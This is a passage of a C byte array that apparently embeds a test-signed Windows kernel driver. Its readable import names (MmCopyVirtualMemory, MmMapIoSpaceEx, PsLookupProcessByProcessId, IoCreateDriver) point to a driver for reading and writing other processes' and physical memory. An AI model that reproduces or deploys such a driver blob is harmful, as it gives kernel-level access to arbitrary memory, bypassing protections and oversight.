0x3E, 0x17, 0x00, 0x00, 613 | 0x70, 0x24, 0x00, 0x00, 0x40, 0x17, 0x00, 0x00, 0xB4, 0x17, 0x00, 0x00, 614 | 0x4C, 0x24, 0x00, 0x00, 0xC0, 0x17, 0x00, 0x00, 0x75, 0x18, 0x00, 0x00, 615 | 0x0C, 0x25, 0x00, 0x00, 0xA0, 0x18, 0x00, 0x00, 0xA5, 0x18, 0x00, 0x00, 616 | 0xE0, 0x24, 0x00, 0x00, 0xC0, 0x18, 0x00, 0x00, 0xC6, 0x18, 0x00, 0x00, 617 | 0xE0, 0x24, 0x00, 0x00, 0x00, 0x19, 0x00, 0x00, 0xAA, 0x1B, 0x00, 0x00, 618 | 0xE0, 0x24, 0x00, 0x00, 0xC0, 0x1B, 0x00, 0x00, 0xC7, 0x1C, 0x00, 0x00, 619 | 0xE0, 0x24, 0x00, 0x00, 0x00, 0x1D, 0x00, 0x00, 0x43, 0x1D, 0x00, 0x00, 620 | 0xE8, 0x24, 0x00, 0x00, 0x80, 0x1D, 0x00, 0x00, 0xA6, 0x1D, 0x00, 0x00, 621 | 0xF8, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 622 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 623 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 624 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 625 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 626 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 627 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 628 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 629 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 630 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 631 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 632 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 633 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 634 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 635 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 636 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 637 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 638 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 639 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 640 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 641 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 642 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 643 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 644 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 645 | 0x28, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 646 | 0xF6, 0x51, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 647 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 648 | 0x00, 0x00, 0x00, 0x00, 0xA8, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 649 | 0xC0, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD0, 0x50, 0x00, 0x00, 650 | 0x00, 0x00, 0x00, 0x00, 0xE2, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 651 | 0xF4, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x51, 0x00, 0x00, 652 | 0x00, 0x00, 0x00, 0x00, 0x1C, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 653 | 0x34, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4A, 0x51, 0x00, 0x00, 654 | 0x00, 0x00, 0x00, 0x00, 0x62, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 655 | 0x72, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x51, 0x00, 0x00, 656 | 0x00, 0x00, 0x00, 0x00, 0xA2, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 657 | 0xB8, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDA, 0x51, 0x00, 0x00, 658 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 659 | 0x3A, 0x09, 0x52, 0x74, 0x6C, 0x49, 0x6E, 0x69, 0x74, 0x55, 0x6E, 0x69, 660 | 0x63, 0x6F, 0x64, 0x65, 0x53, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x00, 0x00, 661 | 0x28, 0x09, 0x52, 0x74, 0x6C, 0x47, 0x65, 0x74, 0x56, 0x65, 0x72, 0x73, 662 | 0x69, 0x6F, 0x6E, 0x00, 0x4D, 0x06, 0x4D, 0x6D, 0x55, 0x6E, 0x6D, 0x61, 663 | 0x70, 0x49, 0x6F, 0x53, 0x70, 0x61, 0x63, 0x65, 0x00, 0x00, 0x1E, 0x06, 664 | 0x4D, 0x6D, 0x4D, 0x61, 0x70, 0x49, 0x6F, 0x53, 0x70, 0x61, 0x63, 0x65, 665 | 0x45, 0x78, 0x00, 0x00, 0x76, 0x04, 0x49, 0x6F, 0x66, 0x43, 0x6F, 0x6D, 666 | 0x70, 0x6C, 0x65, 0x74, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 667 | 0x00, 0x00, 0x43, 0x03, 0x49, 0x6F, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 668 | 0x44, 0x65, 0x76, 0x69, 0x63, 0x65, 0x00, 0x00, 0x50, 0x03, 0x49, 0x6F, 669 | 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 670 | 0x69, 0x63, 0x4C, 0x69, 0x6E, 0x6B, 0x00, 0x00, 0x88, 0x03, 0x49, 0x6F, 671 | 0x47, 0x65, 0x74, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6E, 0x74, 0x50, 0x72, 672 | 0x6F, 0x63, 0x65, 0x73, 0x73, 0x00, 0xFB, 0x06, 0x4F, 0x62, 0x66, 0x44, 673 | 0x65, 0x72, 0x65, 0x66, 0x65, 0x72, 0x65, 0x6E, 0x63, 0x65, 0x4F, 0x62, 674 | 0x6A, 0x65, 0x63, 0x74, 0x00, 0x00, 0xF0, 0x05, 0x4D, 0x6D, 0x43, 0x6F, 675 | 0x70, 0x79, 0x4D, 0x65, 0x6D, 0x6F, 0x72, 0x79, 0x00, 0x00, 0xE9, 0x07, 676 | 0x50, 0x73, 0x4C, 0x6F, 0x6F, 0x6B, 0x75, 0x70, 0x50, 0x72, 0x6F, 0x63, 677 | 0x65, 0x73, 0x73, 0x42, 0x79, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 678 | 0x49, 0x64, 0x00, 0x00, 0x46, 0x03, 0x49, 0x6F, 0x43, 0x72, 0x65, 0x61, 679 | 0x74, 0x65, 0x44, 0x72, 0x69, 0x76, 0x65, 0x72, 0x00, 0x00, 0xF1, 0x05, 680 | 0x4D, 0x6D, 0x43, 0x6F, 0x70, 0x79, 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 681 | 0x6C, 0x4D, 0x65, 0x6D, 0x6F, 0x72, 0x79, 0x00, 0xB0, 0x07, 0x50, 0x73, 682 | 0x47, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 0x53, 0x65, 683 | 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x42, 0x61, 0x73, 0x65, 0x41, 0x64, 0x64, 684 | 0x72, 0x65, 0x73, 0x73, 0x00, 0x00, 0xFB, 0x0B, 0x5A, 0x77, 0x51, 0x75, 685 | 0x65, 0x72, 0x79, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x49, 0x6E, 0x66, 686 | 0x6F, 0x72, 0x6D, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x00, 0x00, 0x6E, 0x74, 687 | 0x6F, 0x73, 0x6B, 0x72, 0x6E, 0x6C, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x00, 688 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 689 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 690 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 691 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 692 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 693 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 694 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 695 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 696 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 697 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 698 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 699 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 700 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 701 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 702 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 703 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 704 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 705 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 706 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 707 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 708 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 709 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 710 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 711 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 712 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 713 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 714 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 715 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 716 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 717 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 718 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 719 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 720 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 721 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 722 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 723 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 724 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 725 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 726 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 727 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 728 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 729 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 730 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 731 | 0x80, 0xA0, 0x88, 0xA0, 0x90, 0xA0, 0x98, 0xA0, 0xA0, 0xA0, 0x28, 0xA1, 732 | 0x40, 0xA1, 0x48, 0xA1, 0x50, 0xA1, 0xE8, 0xA1, 0xF0, 0xA1, 0xF8, 0xA1, 733 | 0x00, 0xA2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 734 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 735 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 736 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 737 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 738 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 739 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 740 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 741 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 742 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 743 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 744 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 745 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 746 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 747 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 748 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 749 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 750 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 751 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 752 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 753 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 754 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 755 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 756 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 757 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 758 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 759 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 760 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 761 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 762 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 763 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 764 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 765 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 766 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 767 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 768 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 769 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 770 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 771 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 772 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 773 | 0xF8, 0x06, 0x00, 0x00, 0x00, 0x02, 0x02, 0x00, 0x30, 0x82, 0x06, 0xE7, 774 | 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x07, 0x02, 0xA0, 775 | 0x82, 0x06, 0xD8, 0x30, 0x82, 0x06, 0xD4, 0x02, 0x01, 0x01, 0x31, 0x0F, 776 | 0x30, 0x0D, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65, 0x03, 0x04, 0x02, 777 | 0x01, 0x05, 0x00, 0x30, 0x82, 0x01, 0xB8, 0x06, 0x0A, 0x2B, 0x06, 0x01, 778 | 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x04, 0xA0, 0x82, 0x01, 0xA8, 0x30, 779 | 0x82, 0x01, 0xA4, 0x30, 0x82, 0x01, 0x6D, 0x06, 0x0A, 0x2B, 0x06, 0x01, 780 | 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x0F, 0x30, 0x82, 0x01, 0x5D, 0x03, 781 | 0x01, 0x00, 0xA0, 0x82, 0x01, 0x56, 0xA1, 0x82, 0x01, 0x52, 0x04, 0x10, 782 | 0xA6, 0xB5, 0x86, 0xD5, 0xB4, 0xA1, 0x24, 0x66, 0xAE, 0x05, 0xA2, 0x17, 783 | 0xDA, 0x8E, 0x60, 0xD6, 0x04, 0x82, 0x01, 0x3C, 0x31, 0x82, 0x01, 0x38, 784 | 0x30, 0x82, 0x01, 0x34, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 785 | 0x37, 0x02, 0x03, 0x02, 0x31, 0x82, 0x01, 0x24, 0x04, 0x82, 0x01, 0x20, 786 | 0x00, 0x00, 0x00, 0x00, 0x53, 0x78, 0xEA, 0x31, 0x3F, 0x2D, 0x0F, 0x3C, 787 | 0x58, 0x7D, 0xC4, 0xB4, 0xCA, 0x95, 0x80, 0x56, 0x27, 0xC6, 0x78, 0x21, 788 | 0x4A, 0x5F, 0x21, 0xAB, 0xAC, 0x9F, 0xA4, 0x10, 0xA0, 0x24, 0x6B, 0xB0, 789 | 0x00, 0x04, 0x00, 0x00, 0x7B, 0x73, 0x87, 0x0C, 0xA4, 0x53, 0xB6, 0x0B, 790 | 0x7F, 0xD1, 0x05, 0xC3, 0xEB, 0x99, 0xDF, 0xBF, 0xB1, 0x2E, 0x1F, 0xE9, 791 | 0xE5, 0x5A, 0x0C, 0x88, 0x29, 0xD8, 0x7C, 0x42, 0x84, 0x99, 0x30, 0xB5, 792 | 0x00, 0x14, 0x00, 0x00, 0x11, 0xAE, 0x89, 0x32, 0x53, 0x0B, 0x31, 0xEA, 793 | 0xE3, 0xA1, 0xC2, 0xEF, 0x23, 0xAE, 0xBD, 0x73, 0x08, 0x49, 0x54, 0xC3, 794 | 0x3C, 0x78, 0x9B, 0x10, 0xA8, 0x61, 0xB4, 0x63, 0xD4, 0xE0, 0x0B, 0xD8, 795 | 0x00, 0x1A, 0x00, 0x00, 0x2B, 0x7A, 0xCB, 0x6C, 0x37, 0xE1, 0x0B, 0x64, 796 | 0xC9, 0xB0, 0xBD, 0x86, 0x0C, 0x6A, 0x31, 0x90, 0x9A, 0xB6, 0x4E, 0xA5, 797 | 0x09, 0xE6, 0x8B, 0x92, 0x6A, 0x4C, 0x99, 0x09, 0x10, 0x7D, 0x4C, 0xDE, 798 | 0x00, 0x1C, 0x00, 0x00, 0x1F, 0x4B, 0xA5, 0xC9, 0xAB, 0x65, 0x57, 0x67, 799 | 0x4F, 0xD5, 0x1C, 0x37, 0x4C, 0x8A, 0x07, 0x75, 0xDB, 0xA5, 0x4E, 0x83, 800 | 0x74, 0xB6, 0x76, 0x2B, 0xB2, 0xDE, 0xB2, 0x04, 0xF4, 0xD9, 0x36, 0x5F, 801 | 0x00, 0x1E, 0x00, 0x00, 0x2C, 0x48, 0x44, 0x4E, 0xFD, 0xD0, 0x4A, 0x6E, 802 | 0xC6, 0x7F, 0xBF, 0xBB, 0x08, 0xE7, 0x32, 0x9B, 0x15, 0x79, 0xA7, 0xC9, 803 | 0xC4, 0xA2, 0x42, 0xF1, 0x18, 0x31, 0x9A, 0x32, 0x54, 0x52, 0x14, 0x89, 804 | 0x00, 0x22, 0x00, 0x00, 0x4D, 0x5E, 0x26, 0x42, 0x69, 0xAE, 0xDB, 0x7A, 805 | 0x17, 0x4E, 0xE5, 0x6B, 0x09, 0xCC, 0x67, 0xB0, 0x40, 0x02, 0x32, 0xEB, 806 | 0xCC, 0x52, 0x5D, 0x37, 0x12, 0xA4, 0xFF, 0xF2, 0xCC, 0x0A, 0xB7, 0x1D, 807 | 0x00, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 808 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 809 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 810 | 0x30, 0x31, 0x30, 0x0D, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65, 0x03, 811 | 0x04, 0x02, 0x01, 0x05, 0x00, 0x04, 0x20, 0x13, 0x22, 0x4F, 0x2C, 0xF9, 812 | 0x27, 0xE5, 0x20, 0x80, 0x8D, 0x96, 0x48, 0x8E, 0x88, 0xF6, 0xFD, 0xEB, 813 | 0x58, 0xDB, 0x7F, 0x3A, 0x25, 0x07, 0xE2, 0x83, 0xA0, 0x3A, 0xD4, 0x7A, 814 | 0xC4, 0xAB, 0x4F, 0xA0, 0x82, 0x03, 0x10, 0x30, 0x82, 0x03, 0x0C, 0x30, 815 | 0x82, 0x01, 0xF4, 0xA0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x10, 0x1F, 0x79, 816 | 0x6F, 0x37, 0x16, 0xE1, 0xB1, 0xBC, 0x49, 0xFB, 0xB9, 0xC5, 0xFA, 0xA7, 817 | 0xFB, 0xA3, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 818 | 0x01, 0x01, 0x05, 0x05, 0x00, 0x30, 0x2F, 0x31, 0x2D, 0x30, 0x2B, 0x06, 819 | 0x03, 0x55, 0x04, 0x03, 0x13, 0x24, 0x57, 0x44, 0x4B, 0x54, 0x65, 0x73, 820 | 0x74, 0x43, 0x65, 0x72, 0x74, 0x20, 0x53, 0x69, 0x6D, 0x6F, 0x6E, 0x2C, 821 | 0x31, 0x33, 0x33, 0x38, 0x39, 0x36, 0x34, 0x39, 0x34, 0x37, 0x31, 0x36, 822 | 0x31, 0x36, 0x35, 0x33, 0x30, 0x35, 0x30, 0x1E, 0x17, 0x0D, 0x32, 0x35, 823 | 0x30, 0x34, 0x32, 0x30, 0x31, 0x39, 0x30, 0x34, 0x33, 0x31, 0x5A, 0x17, 824 | 0x0D, 0x33, 0x35, 0x30, 0x34, 0x32, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 825 | 0x30, 0x5A, 0x30, 0x2F, 0x31, 0x2D, 0x30, 0x2B, 0x06, 0x03, 0x55, 0x04, 826 | 0x03, 0x13, 0x24, 0x57, 0x44, 0x4B, 0x54, 0x65, 0x73, 0x74, 0x43, 0x65, 827 | 0x72, 0x74, 0x20, 0x53, 0x69, 0x6D, 0x6F, 0x6E, 0x2C, 0x31, 0x33, 0x33, 828 | 0x38, 0x39, 0x36, 0x34, 0x39, 0x34, 0x37, 0x31, 0x36, 0x31, 0x36, 0x35, 829 | 0x33, 0x30, 0x35, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0D, 0x06, 0x09, 0x2A, 830 | 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 831 | 0x01, 0x0F, 0x00, 0x30, 0x82, 0x01, 0x0A, 0x02, 0x82, 0x01, 0x01, 0x00, 832 | 0xCB, 0xEE, 0x28, 0x3F, 0x83, 0x82, 0x62, 0x97, 0x1C, 0xFA, 0x63, 0x5E, 833 | 0xCC, 0x6E, 0x77, 0xE8, 0x90, 0x99, 0x68, 0x8D, 0x46, 0x59, 0xAE, 0x0D, 834 | 0xF7, 0xE5, 0xEE, 0xAF, 0xBD, 0x24, 0xF1, 0x0F, 0xE4, 0xF4, 0xA9, 0xDD, 835 | 0xC3, 0x92, 0x7F, 0xA0, 0x38, 0x61, 0x10, 0x4A, 0xCC, 0x59, 0x44, 0x57, 836 | 0x61, 0x32, 0xD4, 0x98, 0x46, 0x83, 0x34, 0xF2, 0x93, 0xAE, 0x92, 0x6F, 837 | 0x7D, 0x4B, 0xB3, 0xCB, 0x0C, 0x40, 0x7C, 0xB7, 0xF8, 0xEC, 0x56, 0x5F, 838 | 0x67, 0xD6, 0xA2, 0x3A, 0x3D, 0x73, 0xA3, 0x16, 0xBE, 0x24, 0xD8, 0xE0, 839 | 0xE4, 0x33, 0x82, 0xBA, 0x01, 0x30, 0xB6, 0x7A, 0xC2, 0x88, 0xAC, 0xC8, 840 | 0x58, 